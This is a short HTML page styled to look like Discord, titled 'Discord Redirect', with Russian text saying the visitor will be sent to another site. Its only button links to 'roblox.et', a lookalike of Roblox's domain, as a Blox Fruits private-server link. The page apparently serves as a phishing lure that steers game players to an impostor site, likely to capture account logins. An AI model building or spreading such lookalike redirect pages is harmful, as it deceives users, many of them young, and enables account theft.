<!DOCTYPE html>
<html>
<head>
  <title>Discord Redirect</title>
  <style>
    body {
      background-color: #36393f;
      color: #dcddde;
      font-family: 'Whitney', 'Helvetica Neue', Helvetica, Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      margin: 0;
    }

    .container {
      background-color: #40444b;
      border-radius: 5px;
      padding: 40px;
      text-align: center;
      box-shadow: 0 2px 10px 0 rgba(0, 0, 0, 0.2);
    }

    h1 {
      font-size: 24px;
      margin-bottom: 20px;
    }

    p {
      font-size: 16px;
      margin-bottom: 30px;
    }

    .btn {
      background-color: #7289da;
      color: #fff;
      border: none;
      padding: 15px 30px;
      font-size: 18px;
      border-radius: 5px;
      cursor: pointer;
      text-decoration: none;
      transition: background-color 0.2s ease;
    }

    .btn:hover {
      background-color: #677bc4;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Переадресация</h1>
    <p>Вы будете перенаправлены на другой сайт.</p>
    <a href="https://www.roblox.et/games/2753915549/Blox-Fruits?privateServerLinkCode=73705660139748476109311471652488" class="btn">Продолжить</a> 
    </div>
</body>
</html>
